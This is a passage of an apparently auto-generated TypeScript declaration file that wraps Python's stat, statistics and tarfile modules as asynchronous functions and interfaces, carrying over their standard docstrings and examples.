FILE_ATTRIBUTE_READONLY: Promise<any>\n\tlet FILE_ATTRIBUTE_REPARSE_POINT: Promise<any>\n\tlet FILE_ATTRIBUTE_SPARSE_FILE: Promise<any>\n\tlet FILE_ATTRIBUTE_SYSTEM: Promise<any>\n\tlet FILE_ATTRIBUTE_TEMPORARY: Promise<any>\n\tlet FILE_ATTRIBUTE_VIRTUAL: Promise<any>\n}\ndeclare module statistics {\n\tvar _\n\n\t/**\n\t * Return the sample arithmetic mean of data.\n\t * \n\t * >>> mean([1, 2, 3, 4, 4])\n\t * 2.8\n\t * \n\t * >>> from fractions import Fraction as F\n\t * >>> mean([F(3, 7), F(1, 21), F(5, 3), F(1, 3)])\n\t * Fraction(13, 21)\n\t * \n\t * >>> from decimal import Decimal as D\n\t * >>> mean([D(\"0.5\"), D(\"0.75\"), D(\"0.625\"), D(\"0.375\")])\n\t * Decimal('0.5625')\n\t * \n\t * If ``data`` is empty, StatisticsError will be raised.\n\t * \n\t */\n\tfunction mean(data): Promise<any>\n\tfunction mean$({ data }): Promise<any>\n\n\t/**\n\t * Convert data to floats and compute the arithmetic mean.\n\t * \n\t * This runs faster than the mean() function and it always returns a float.\n\t * If the input dataset is empty, it raises a StatisticsError.\n\t * \n\t * >>> fmean([3.5, 4.0, 5.25])\n\t * 4.25\n\t * \n\t */\n\tfunction fmean(data, weights?): Promise<any>\n\tfunction fmean$({ data, weights }: { data, weights?}): Promise<any>\n\n\t/**\n\t * Convert data to floats and compute the geometric mean.\n\t * \n\t * Raises a StatisticsError if the input dataset is empty,\n\t * if it contains a zero, or if it contains a negative value.\n\t * \n\t * No special efforts are made to achieve exact results.\n\t * (However, this may change in the future.)\n\t * \n\t * >>> round(geometric_mean([54, 24, 36]), 9)\n\t * 36.0\n\t * \n\t */\n\tfunction geometric_mean(data): Promise<any>\n\tfunction geometric_mean$({ data }): Promise<any>\n\n\t/**\n\t * Return the harmonic mean of data.\n\t * \n\t * The harmonic mean is the reciprocal of the arithmetic mean of the\n\t * reciprocals of the data. It can be used for averaging ratios or\n\t * rates, for example speeds.\n\t * \n\t * Suppose a car travels 40 km/hr for 5 km and then speeds-up to\n\t * 60 km/hr for another 5 km. What is the average speed?\n\t * \n\t * >>> harmonic_mean([40, 60])\n\t * 48.0\n\t * \n\t * Suppose a car travels 40 km/hr for 5 km, and when traffic clears,\n\t * speeds-up to 60 km/hr for the remaining 30 km of the journey. What\n\t * is the average speed?\n\t * \n\t * >>> harmonic_mean([40, 60], weights=[5, 30])\n\t * 56.0\n\t * \n\t * If ``data`` is empty, or any element is less than zero,\n\t * ``harmonic_mean`` will raise ``StatisticsError``.\n\t * \n\t */\n\tfunction harmonic_mean(data, weights?): Promise<any>\n\tfunction harmonic_mean$({ data, weights }: { data, weights?}): Promise<any>\n\n\t/**\n\t * Return the median (middle value) of numeric data.\n\t * \n\t * When the number of data points is odd, return the middle data point.\n\t * When the number of data points is even, the median is interpolated by\n\t * taking the average of the two middle values:\n\t * \n\t * >>> median([1, 3, 5])\n\t * 3\n\t * >>> median([1, 3, 5, 7])\n\t * 4.0\n\t * \n\t * \n\t */\n\tfunction median(data): Promise<any>\n\tfunction median$({ data }): Promise<any>\n\n\t/**\n\t * Return the low median of numeric data.\n\t * \n\t * When the number of data points is odd, the middle value is returned.\n\t * When it is even, the smaller of the two middle values is returned.\n\t * \n\t * >>> median_low([1, 3, 5])\n\t * 3\n\t * >>> median_low([1, 3, 5, 7])\n\t * 3\n\t * \n\t * \n\t */\n\tfunction median_low(data): Promise<any>\n\tfunction median_low$({ data }): Promise<any>\n\n\t/**\n\t * Return the high median of data.\n\t * \n\t * When the number of data points is odd, the middle value is returned.\n\t * When it is even, the larger of the two middle values is returned.\n\t * \n\t * >>> median_high([1, 3, 5])\n\t * 3\n\t * >>> median_high([1, 3, 5, 7])\n\t * 5\n\t * \n\t * \n\t */\n\tfunction median_high(data): Promise<any>\n\tfunction median_high$({ data }): Promise<any>\n\n\t/**\n\t * Return the 50th percentile (median) of grouped continuous data.\n\t * \n\t * >>> median_grouped([1, 2, 2, 3, 4, 4, 4, 4, 4, 5])\n\t * 3.7\n\t * >>> median_grouped([52, 52, 53, 54])\n\t * 52.5\n\t * \n\t * This calculates the median as the 50th percentile, and should be\n\t * used when your data is continuous and grouped. In the above example,\n\t * the values 1, 2, 3, etc. actually represent the midpoint of classes\n\t * 0.5-1.5, 1.5-2.5, 2.5-3.5, etc. The middle value falls somewhere in\n\t * class 3.5-4.5, and interpolation is used to estimate it.\n\t * \n\t * Optional argument ``interval`` represents the class interval, and\n\t * defaults to 1. Changing the class interval naturally will change the\n\t * interpolated 50th percentile value:\n\t * \n\t * >>> median_grouped([1, 3, 3, 5, 7], interval=1)\n\t * 3.25\n\t * >>> median_grouped([1, 3, 3, 5, 7], interval=2)\n\t * 3.5\n\t * \n\t * This function does not check whether the data points are at least\n\t * ``interval`` apart.\n\t * \n\t */\n\tfunction median_grouped(data, interval?): Promise<any>\n\tfunction median_grouped$({ data, interval }: { data, interval?}): Promise<any>\n\n\t/**\n\t * Return the most common data point from discrete or nominal data.\n\t * \n\t * ``mode`` assumes discrete data, and returns a single value. This is the\n\t * standard treatment of the mode as commonly taught in schools:\n\t * \n\t * >>> mode([1, 1, 2, 3, 3, 3, 3, 4])\n\t * 3\n\t * \n\t * This also works with nominal (non-numeric) data:\n\t * \n\t * >>> mode([\"red\", \"blue\", \"blue\", \"red\", \"green\", \"red\", \"red\"])\n\t * 'red'\n\t * \n\t * If there are multiple modes with same frequency, return the first one\n\t * encountered:\n\t * \n\t * >>> mode(['red', 'red', 'green', 'blue', 'blue'])\n\t * 'red'\n\t * \n\t * If *data* is empty, ``mode``, raises StatisticsError.\n\t * \n\t * \n\t */\n\tfunction mode(data): Promise<any>\n\tfunction mode$({ data }): Promise<any>\n\n\t/**\n\t * Return a list of the most frequently occurring values.\n\t * \n\t * Will return more than one result if there are multiple modes\n\t * or an empty list if *data* is empty.\n\t * \n\t * >>> multimode('aabbbbbbbbcc')\n\t * ['b']\n\t * >>> multimode('aabbbbccddddeeffffgg')\n\t * ['b', 'd', 'f']\n\t * >>> multimode('')\n\t * []\n\t * \n\t */\n\tfunction multimode(data): Promise<any>\n\tfunction multimode$({ data }): Promise<any>\n\n\t/**\n\t * Divide *data* into *n* continuous intervals with equal probability.\n\t * \n\t * Returns a list of (n - 1) cut points separating the intervals.\n\t * \n\t * Set *n* to 4 for quartiles (the default). Set *n* to 10 for deciles.\n\t * Set *n* to 100 for percentiles which gives the 99 cuts points that\n\t * separate *data* in to 100 equal sized groups.\n\t * \n\t * The *data* can be any iterable containing sample.\n\t * The cut points are linearly interpolated between data points.\n\t * \n\t * If *method* is set to *inclusive*, *data* is treated as population\n\t * data. The minimum value is treated as the 0th percentile and the\n\t * maximum value is treated as the 100th percentile.\n\t * \n\t */\n\tfunction quantiles(data): Promise<any>\n\tfunction quantiles$({ data }): Promise<any>\n\n\t/**\n\t * Return the sample variance of data.\n\t * \n\t * data should be an iterable of Real-valued numbers, with at least two\n\t * values. The optional argument xbar, if given, should be the mean of\n\t * the data. If it is missing or None, the mean is automatically calculated.\n\t * \n\t * Use this function when your data is a sample from a population. To\n\t * calculate the variance from the entire population, see ``pvariance``.\n\t * \n\t * Examples:\n\t * \n\t * >>> data = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5]\n\t * >>> variance(data)\n\t * 1.3720238095238095\n\t * \n\t * If you have already calculated the mean of your data, you can pass it as\n\t * the optional second argument ``xbar`` to avoid recalculating it:\n\t * \n\t * >>> m = mean(data)\n\t * >>> variance(data, m)\n\t * 1.3720238095238095\n\t * \n\t * This function does not check that ``xbar`` is actually the mean of\n\t * ``data``. Giving arbitrary values for ``xbar`` may lead to invalid or\n\t * impossible results.\n\t * \n\t * Decimals and Fractions are supported:\n\t * \n\t * >>> from decimal import Decimal as D\n\t * >>> variance([D(\"27.5\"), D(\"30.25\"), D(\"30.25\"), D(\"34.5\"), D(\"41.75\")])\n\t * Decimal('31.01875')\n\t * \n\t * >>> from fractions import Fraction as F\n\t * >>> variance([F(1, 6), F(1, 2), F(5, 3)])\n\t * Fraction(67, 108)\n\t * \n\t * \n\t */\n\tfunction variance(data, xbar?): Promise<any>\n\tfunction variance$({ data, xbar }: { data, xbar?}): Promise<any>\n\n\t/**\n\t * Return the population variance of ``data``.\n\t * \n\t * data should be a sequence or iterable of Real-valued numbers, with at least one\n\t * value. The optional argument mu, if given, should be the mean of\n\t * the data. If it is missing or None, the mean is automatically calculated.\n\t * \n\t * Use this function to calculate the variance from the entire population.\n\t * To estimate the variance from a sample, the ``variance`` function is\n\t * usually a better choice.\n\t * \n\t * Examples:\n\t * \n\t * >>> data = [0.0, 0.25, 0.25, 1.25, 1.5, 1.75, 2.75, 3.25]\n\t * >>> pvariance(data)\n\t * 1.25\n\t * \n\t * If you have already calculated the mean of the data, you can pass it as\n\t * the optional second argument to avoid recalculating it:\n\t * \n\t * >>> mu = mean(data)\n\t * >>> pvariance(data, mu)\n\t * 1.25\n\t * \n\t * Decimals and Fractions are supported:\n\t * \n\t * >>> from decimal import Decimal as D\n\t * >>> pvariance([D(\"27.5\"), D(\"30.25\"), D(\"30.25\"), D(\"34.5\"), D(\"41.75\")])\n\t * Decimal('24.815')\n\t * \n\t * >>> from fractions import Fraction as F\n\t * >>> pvariance([F(1, 4), F(5, 4), F(1, 2)])\n\t * Fraction(13, 72)\n\t * \n\t * \n\t */\n\tfunction pvariance(data, mu?): Promise<any>\n\tfunction pvariance$({ data, mu }: { data, mu?}): Promise<any>\n\n\t/**\n\t * Return the square root of the sample variance.\n\t * \n\t * See ``variance`` for arguments and other details.\n\t * \n\t * >>> stdev([1.5, 2.5, 2.5, 2.75, 3.25, 4.75])\n\t * 1.0810874155219827\n\t * \n\t * \n\t */\n\tfunction stdev(data, xbar?): Promise<any>\n\tfunction stdev$({ data, xbar }: { data, xbar?}): Promise<any>\n\n\t/**\n\t * Return the square root of the population variance.\n\t * \n\t * See ``pvariance`` for arguments and other details.\n\t * \n\t * >>> pstdev([1.5, 2.5, 2.5, 2.75, 3.25, 4.75])\n\t * 0.986893273527251\n\t * \n\t * \n\t */\n\tfunction pstdev(data, mu?): Promise<any>\n\tfunction pstdev$({ data, mu }: { data, mu?}): Promise<any>\n\n\t/**\n\t * Covariance\n\t * \n\t * Return the sample covariance of two inputs *x* and *y*. Covariance\n\t * is a measure of the joint variability of two inputs.\n\t * \n\t * >>> x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\t * >>> y = [1, 2, 3, 1, 2, 3, 1, 2, 3]\n\t * >>> covariance(x, y)\n\t * 0.75\n\t * >>> z = [9, 8, 7, 6, 5, 4, 3, 2, 1]\n\t * >>> covariance(x, z)\n\t * -7.5\n\t * >>> covariance(z, x)\n\t * -7.5\n\t * \n\t * \n\t */\n\tfunction covariance(x, y): Promise<any>\n\tfunction covariance$({ x, y }): Promise<any>\n\n\t/**\n\t * Pearson's correlation coefficient\n\t * \n\t * Return the Pearson's correlation coefficient for two inputs. Pearson's\n\t * correlation coefficient *r* takes values between -1 and +1. It measures the\n\t * strength and direction of the linear relationship, where +1 means very\n\t * strong, positive linear relationship, -1 very strong, negative linear\n\t * relationship, and 0 no linear relationship.\n\t * \n\t * >>> x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\t * >>> y = [9, 8, 7, 6, 5, 4, 3, 2, 1]\n\t * >>> correlation(x, x)\n\t * 1.0\n\t * >>> correlation(x, y)\n\t * -1.0\n\t * \n\t * \n\t */\n\tfunction correlation(x, y): Promise<any>\n\tfunction correlation$({ x, y }): Promise<any>\n\n\t/**\n\t * Slope and intercept for simple linear regression.\n\t * \n\t * Return the slope and intercept of simple linear regression\n\t * parameters estimated using ordinary least squares. Simple linear\n\t * regression describes relationship between an independent variable\n\t * *x* and a dependent variable *y* in terms of linear function:\n\t * \n\t * y = slope * x + intercept + noise\n\t * \n\t * where *slope* and *intercept* are the regression parameters that are\n\t * estimated, and noise represents the variability of the data that was\n\t * not explained by the linear regression (it is equal to the\n\t * difference between predicted and actual values of the dependent\n\t * variable).\n\t * \n\t * The parameters are returned as a named tuple.\n\t * \n\t * >>> x = [1, 2, 3, 4, 5]\n\t * >>> noise = NormalDist().samples(5, seed=42)\n\t * >>> y = [3 * x[i] + 2 + noise[i] for i in range(5)]\n\t * >>> linear_regression(x, y) #doctest: +ELLIPSIS\n\t * LinearRegression(slope=3.09078914170..., intercept=1.75684970486...)\n\t * \n\t * \n\t */\n\tfunction linear_regression(x, y): Promise<any>\n\tfunction linear_regression$({ x, y }): Promise<any>\n\tinterface IStatisticsError {\n\t}\n\n\t/**\n\t * Normal distribution of a random variable\n\t */\n\n\t/**\n\t * NormalDist where mu is the mean and sigma is the standard deviation.\n\t */\n\tfunction NormalDist(mu?, sigma?): Promise<INormalDist>\n\tfunction NormalDist$({ mu, sigma }: { mu?, sigma?}): Promise<INormalDist>\n\tinterface INormalDist {\n\n\t\t/**\n\t\t * Make a normal distribution instance from sample data.\n\t\t */\n\t\tfrom_samples(data): Promise<any>\n\t\tfrom_samples$({ data }): Promise<any>\n\n\t\t/**\n\t\t * Generate *n* samples for a given mean and standard deviation.\n\t\t */\n\t\tsamples(n): Promise<any>\n\t\tsamples$({ n }): Promise<any>\n\n\t\t/**\n\t\t * Probability density function. P(x <= X < x+dx) / dx\n\t\t */\n\t\tpdf(x): Promise<any>\n\t\tpdf$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Cumulative distribution function. P(X <= x)\n\t\t */\n\t\tcdf(x): Promise<any>\n\t\tcdf$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Inverse cumulative distribution function. x : P(X <= x) = p\n\t\t * \n\t\t * Finds the value of the random variable such that the probability of\n\t\t * the variable being less than or equal to that value equals the given\n\t\t * probability.\n\t\t * \n\t\t * This function is also called the percent point function or quantile\n\t\t * function.\n\t\t * \n\t\t */\n\t\tinv_cdf(p): Promise<any>\n\t\tinv_cdf$({ p }): Promise<any>\n\n\t\t/**\n\t\t * Divide into *n* continuous intervals with equal probability.\n\t\t * \n\t\t * Returns a list of (n - 1) cut points separating the intervals.\n\t\t * \n\t\t * Set *n* to 4 for quartiles (the default). Set *n* to 10 for deciles.\n\t\t * Set *n* to 100 for percentiles which gives the 99 cuts points that\n\t\t * separate the normal distribution in to 100 equal sized groups.\n\t\t * \n\t\t */\n\t\tquantiles(n?): Promise<any>\n\t\tquantiles$({ n }: { n?}): Promise<any>\n\n\t\t/**\n\t\t * Compute the overlapping coefficient (OVL) between two normal distributions.\n\t\t * \n\t\t * Measures the agreement between two normal probability distributions.\n\t\t * Returns a value between 0.0 and 1.0 giving the overlapping area in\n\t\t * the two underlying probability density functions.\n\t\t * \n\t\t * >>> N1 = NormalDist(2.4, 1.6)\n\t\t * >>> N2 = NormalDist(3.2, 2.0)\n\t\t * >>> N1.overlap(N2)\n\t\t * 0.8035050657330205\n\t\t * \n\t\t */\n\t\toverlap(other): Promise<any>\n\t\toverlap$({ other }): Promise<any>\n\n\t\t/**\n\t\t * Compute the Standard Score. (x - mean) / stdev\n\t\t * \n\t\t * Describes *x* in terms of the number of standard deviations\n\t\t * above or below the mean of the normal distribution.\n\t\t * \n\t\t */\n\t\tzscore(x): Promise<any>\n\t\tzscore$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Arithmetic mean of the normal distribution.\n\t\t */\n\t\tmean(): Promise<any>\n\t\tmean$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the median of the normal distribution\n\t\t */\n\t\tmedian(): Promise<any>\n\t\tmedian$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the mode of the normal distribution\n\t\t * \n\t\t * The mode is the value x where which the probability density\n\t\t * function (pdf) takes its maximum value.\n\t\t * \n\t\t */\n\t\tmode(): Promise<any>\n\t\tmode$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Standard deviation of the normal distribution.\n\t\t */\n\t\tstdev(): Promise<any>\n\t\tstdev$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Square of the standard deviation.\n\t\t */\n\t\tvariance(): Promise<any>\n\t\tvariance$($: {}): Promise<any>\n\t}\n\tlet LinearRegression: Promise<any>\n}\ndeclare module tarfile {\n\tvar _\n\n\t/**\n\t * Convert a string to a null-terminated bytes object.\n\t * \n\t */\n\tfunction stn(s, length, encoding, errors): Promise<any>\n\tfunction stn$({ s, length, encoding, errors }): Promise<any>\n\n\t/**\n\t * Convert a null-terminated bytes object to a string.\n\t * \n\t */\n\tfunction nts(s, encoding, errors): Promise<any>\n\tfunction nts$({ s, encoding, errors }): Promise<any>\n\n\t/**\n\t * Convert a number field to a python number.\n\t * \n\t */\n\tfunction nti(s): Promise<any>\n\tfunction nti$({ s }): Promise<any>\n\n\t/**\n\t * Convert a python number to a number field.\n\t * \n\t */\n\tfunction itn(n, digits?, format?): Promise<any>\n\tfunction itn$({ n, digits, format }: { n, digits?, format?}): Promise<any>\n\n\t/**\n\t * Calculate the checksum for a member's header by summing up all\n\t * characters except for the chksum field which is treated as if\n\t * it was filled with spaces. According to the GNU tar sources,\n\t * some tars (Sun and NeXT) calculate chksum with signed char,\n\t * which will be different if there are chars in the buffer with\n\t * the high bit set. So we calculate two checksums, unsigned and\n\t * signed.\n\t * \n\t */\n\tfunction calc_chksums(buf): Promise<any>\n\tfunction calc_chksums$({ buf }): Promise<any>\n\n\t/**\n\t * Copy length bytes from fileobj src to fileobj dst.\n\t * If length is None, copy the entire content.\n\t * \n\t */\n\tfunction copyfileobj(src, dst, length?, exception?, bufsize?): Promise<any>\n\tfunction copyfileobj$({ src, dst, length, exception, bufsize }: { src, dst, length?, exception?, bufsize?}): Promise<any>\n\n\t/**\n\t * Return True if name points to a tar archive that we\n\t * are able to handle, else return False.\n\t * \n\t * 'name' should be a string, file, or file-like object.\n\t * \n\t */\n\tfunction is_tarfile(name): Promise<any>\n\tfunction is_tarfile$({ name }): Promise<any>\n\tfunction main(): Promise<any>\n\tfunction main$($: {}): Promise<any>\n\n\t/**\n\t * Base exception.\n\t */\n\tinterface ITarError {\n\t}\n\n\t/**\n\t * General exception for extract errors.\n\t */\n\tinterface IExtractError extends ITarError {\n\t}\n\n\t/**\n\t * Exception for unreadable tar archives.\n\t */\n\tinterface IReadError extends ITarError {\n\t}\n\n\t/**\n\t * Exception for unavailable compression methods.\n\t */\n\tinterface ICompressionError extends ITarError {\n\t}\n\n\t/**\n\t * Exception for unsupported operations on stream-like TarFiles.\n\t */\n\tinterface IStreamError extends ITarError {\n\t}\n\n\t/**\n\t * Base exception for header errors.\n\t */\n\tinterface IHeaderError extends ITarError {\n\t}\n\n\t/**\n\t * Exception for empty headers.\n\t */\n\tinterface IEmptyHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Exception for truncated headers.\n\t */\n\tinterface ITruncatedHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Exception for end of file headers.\n\t */\n\tinterface IEOFHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Exception for invalid headers.\n\t */\n\tinterface IInvalidHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Exception for missing and invalid extended headers.\n\t */\n\tinterface ISubsequentHeaderError extends IHeaderError {\n\t}\n\n\t/**\n\t * Low-level file object. Supports reading and writing.\n\t * It is used instead of a regular file object for streaming\n\t * access.\n\t * \n\t */\n\tinterface I_LowLevelFile {\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t\tread(size): Promise<any>\n\t\tread$({ size }): Promise<any>\n\t\twrite(s): Promise<any>\n\t\twrite$({ s }): Promise<any>\n\t}\n\n\t/**\n\t * Class that serves as an adapter between TarFile and\n\t * a stream-like object. The stream-like object only\n\t * needs to have a read() or write() method and is accessed\n\t * blockwise. Use of gzip or bzip2 compression is possible.\n\t * A stream-like object could be for example: sys.stdin,\n\t * sys.stdout, a socket, a tape device etc.\n\t * \n\t * _Stream is intended to be used only internally.\n\t * \n\t */\n\tinterface I_Stream {\n\n\t\t/**\n\t\t * Write string s to the stream.\n\t\t * \n\t\t */\n\t\twrite(s): Promise<any>\n\t\twrite$({ s }): Promise<any>\n\n\t\t/**\n\t\t * Close the _Stream object. No operation should be\n\t\t * done on it afterwards.\n\t\t * \n\t\t */\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the stream's file pointer position.\n\t\t * \n\t\t */\n\t\ttell(): Promise<any>\n\t\ttell$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the stream's file pointer to pos. Negative seeking\n\t\t * is forbidden.\n\t\t * \n\t\t */\n\t\tseek(pos?): Promise<any>\n\t\tseek$({ pos }: { pos?}): Promise<any>\n\n\t\t/**\n\t\t * Return the next size number of bytes from the stream.\n\t\t */\n\t\tread(size): Promise<any>\n\t\tread$({ size }): Promise<any>\n\t}\n\n\t/**\n\t * Small proxy class that enables transparent compression\n\t * detection for the Stream interface (mode 'r|*').\n\t * \n\t */\n\tinterface I_StreamProxy {\n\t\tread(size): Promise<any>\n\t\tread$({ size }): Promise<any>\n\t\tgetcomptype(): Promise<any>\n\t\tgetcomptype$($: {}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * A thin wrapper around an existing file object that\n\t * provides a part of its data as an individual file\n\t * object.\n\t * \n\t */\n\tinterface I_FileInFile {\n\t\tflush(): Promise<any>\n\t\tflush$($: {}): Promise<any>\n\t\treadable(): Promise<any>\n\t\treadable$($: {}): Promise<any>\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the current file position.\n\t\t * \n\t\t */\n\t\ttell(): Promise<any>\n\t\ttell$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Seek to a position in the file.\n\t\t * \n\t\t */\n\t\tseek(position, whence?): Promise<any>\n\t\tseek$({ position, whence }: { position, whence?}): Promise<any>\n\n\t\t/**\n\t\t * Read data from the file.\n\t\t * \n\t\t */\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\t\treadinto(b): Promise<any>\n\t\treadinto$({ b }): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\tfunction ExFileObject(tarfile, tarinfo): Promise<IExFileObject>\n\tfunction ExFileObject$({ tarfile, tarinfo }): Promise<IExFileObject>\n\tinterface IExFileObject {\n\t}\n\n\t/**\n\t * Informational class which holds the details about an\n\t * archive member given by a tar header block.\n\t * TarInfo objects are returned by TarFile.getmember(),\n\t * TarFile.getmembers() and TarFile.gettarinfo() and are\n\t * usually created internally.\n\t * \n\t */\n\n\t/**\n\t * Construct a TarInfo object. name is the optional name\n\t * of the member.\n\t * \n\t */\n\tfunction TarInfo(name?): Promise<ITarInfo>\n\tfunction TarInfo$({ name }: { name?}): Promise<ITarInfo>\n\tinterface ITarInfo {\n\n\t\t/**\n\t\t * In pax headers, \"name\" is called \"path\".\n\t\t */\n\t\tpath(): Promise<any>\n\t\tpath$($: {}): Promise<any>\n\t\tpath(name): Promise<any>\n\t\tpath$({ name }): Promise<any>\n\n\t\t/**\n\t\t * In pax headers, \"linkname\" is called \"linkpath\".\n\t\t */\n\t\tlinkpath(): Promise<any>\n\t\tlinkpath$($: {}): Promise<any>\n\t\tlinkpath(linkname): Promise<any>\n\t\tlinkpath$({ linkname }): Promise<any>\n\n\t\t/**\n\t\t * Return the TarInfo's attributes as a dictionary.\n\t\t * \n\t\t */\n\t\tget_info(): Promise<any>\n\t\tget_info$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a tar header as a string of 512 byte blocks.\n\t\t * \n\t\t */\n\t\ttobuf(format?, encoding?, errors?): Promise<any>\n\t\ttobuf$({ format, encoding, errors }: { format?, encoding?, errors?}): Promise<any>\n\n\t\t/**\n\t\t * Return the object as a ustar header block.\n\t\t * \n\t\t */\n\t\tcreate_ustar_header(info, encoding, errors): Promise<any>\n\t\tcreate_ustar_header$({ info, encoding, errors }): Promise<any>\n\n\t\t/**\n\t\t * Return the object as a GNU header block sequence.\n\t\t * \n\t\t */\n\t\tcreate_gnu_header(info, encoding, errors): Promise<any>\n\t\tcreate_gnu_header$({ info, encoding, errors }): Promise<any>\n\n\t\t/**\n\t\t * Return the object as a ustar header block. If it cannot be\n\t\t * represented this way, prepend a pax extended header sequence\n\t\t * with supplement information.\n\t\t * \n\t\t */\n\t\tcreate_pax_header(info, encoding): Promise<any>\n\t\tcreate_pax_header$({ info, encoding }): Promise<any>\n\n\t\t/**\n\t\t * Return the object as a pax global header block sequence.\n\t\t * \n\t\t */\n\t\tcreate_pax_global_header(pax_headers): Promise<any>\n\t\tcreate_pax_global_header$({ pax_headers }): Promise<any>\n\n\t\t/**\n\t\t * Construct a TarInfo object from a 512 byte bytes object.\n\t\t * \n\t\t */\n\t\tfrombuf(buf, encoding, errors): Promise<any>\n\t\tfrombuf$({ buf, encoding, errors }): Promise<any>\n\n\t\t/**\n\t\t * Return the next TarInfo object from TarFile object\n\t\t * tarfile.\n\t\t * \n\t\t */\n\t\tfromtarfile(tarfile): Promise<any>\n\t\tfromtarfile$({ tarfile }): Promise<any>\n\n\t\t/**\n\t\t * Return True if the Tarinfo object is a regular file.\n\t\t */\n\t\tisreg(): Promise<any>\n\t\tisreg$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if the Tarinfo object is a regular file.\n\t\t */\n\t\tisfile(): Promise<any>\n\t\tisfile$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a directory.\n\t\t */\n\t\tisdir(): Promise<any>\n\t\tisdir$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a symbolic link.\n\t\t */\n\t\tissym(): Promise<any>\n\t\tissym$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a hard link.\n\t\t */\n\t\tislnk(): Promise<any>\n\t\tislnk$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a character device.\n\t\t */\n\t\tischr(): Promise<any>\n\t\tischr$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a block device.\n\t\t */\n\t\tisblk(): Promise<any>\n\t\tisblk$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a FIFO.\n\t\t */\n\t\tisfifo(): Promise<any>\n\t\tisfifo$($: {}): Promise<any>\n\t\tissparse(): Promise<any>\n\t\tissparse$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is one of character device, block device or FIFO.\n\t\t */\n\t\tisdev(): Promise<any>\n\t\tisdev$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * The TarFile Class provides an interface to tar archives.\n\t * \n\t */\n\n\t/**\n\t * Open an (uncompressed) tar archive `name'. `mode' is either 'r' to\n\t * read from an existing archive, 'a' to append data to an existing\n\t * file or 'w' to create a new file overwriting an existing one. `mode'\n\t * defaults to 'r'.\n\t * If `fileobj' is given, it is used for reading or writing data. If it\n\t * can be determined, `mode' is overridden by `fileobj's mode.\n\t * `fileobj' is not closed, when TarFile is closed.\n\t * \n\t */\n\tfunction TarFile(name?, mode?, fileobj?, format?, tarinfo?, dereference?, ignore_zeros?, encoding?, errors?, pax_headers?, debug?, errorlevel?, copybufsize?): Promise<ITarFile>\n\tfunction TarFile$({ name, mode, fileobj, format, tarinfo, dereference, ignore_zeros, encoding, errors, pax_headers, debug, errorlevel, copybufsize }: { name?, mode?, fileobj?, format?, tarinfo?, dereference?, ignore_zeros?, encoding?, errors?, pax_headers?, debug?, errorlevel?, copybufsize?}): Promise<ITarFile>\n\tinterface ITarFile {\n\n\t\t/**\n\t\t * Open a tar archive for reading, writing or appending. Return\n\t\t * an appropriate TarFile class.\n\t\t * \n\t\t * mode:\n\t\t * 'r' or 'r:*' open for reading with transparent compression\n\t\t * 'r:' open for reading exclusively uncompressed\n\t\t * 'r:gz' open for reading with gzip compression\n\t\t * 'r:bz2' open for reading with bzip2 compression\n\t\t * 'r:xz' open for reading with lzma compression\n\t\t * 'a' or 'a:' open for appending, creating the file if necessary\n\t\t * 'w' or 'w:' open for writing without compression\n\t\t * 'w:gz' open for writing with gzip compression\n\t\t * 'w:bz2' open for writing with bzip2 compression\n\t\t * 'w:xz' open for writing with lzma compression\n\t\t * \n\t\t * 'x' or 'x:' create a tarfile exclusively without compression, raise\n\t\t * an exception if the file is already created\n\t\t * 'x:gz' create a gzip compressed tarfile, raise an exception\n\t\t * if the file is already created\n\t\t * 'x:bz2' create a bzip2 compressed tarfile, raise an exception\n\t\t * if the file is already created\n\t\t * 'x:xz' create an lzma compressed tarfile, raise an exception\n\t\t * if the file is already created\n\t\t * \n\t\t * 'r|*' open a stream of tar blocks with transparent compression\n\t\t * 'r|' open an uncompressed stream of tar blocks for reading\n\t\t * 'r|gz' open a gzip compressed stream of tar blocks\n\t\t * 'r|bz2' open a bzip2 compressed stream of tar blocks\n\t\t * 'r|xz' open an lzma compressed stream of tar blocks\n\t\t * 'w|' open an uncompressed stream for writing\n\t\t * 'w|gz' open a gzip compressed stream for writing\n\t\t * 'w|bz2' open a bzip2 compressed stream for writing\n\t\t * 'w|xz' open an lzma compressed stream for writing\n\t\t * \n\t\t */\n\t\topen(name?, mode?, fileobj?, bufsize?): Promise<any>\n\t\topen$({ name, mode, fileobj, bufsize }: { name?, mode?, fileobj?, bufsize?}): Promise<any>\n\n\t\t/**\n\t\t * Open uncompressed tar archive name for reading or writing.\n\t\t * \n\t\t */\n\t\ttaropen(name, mode?, fileobj?): Promise<any>\n\t\ttaropen$({ name, mode, 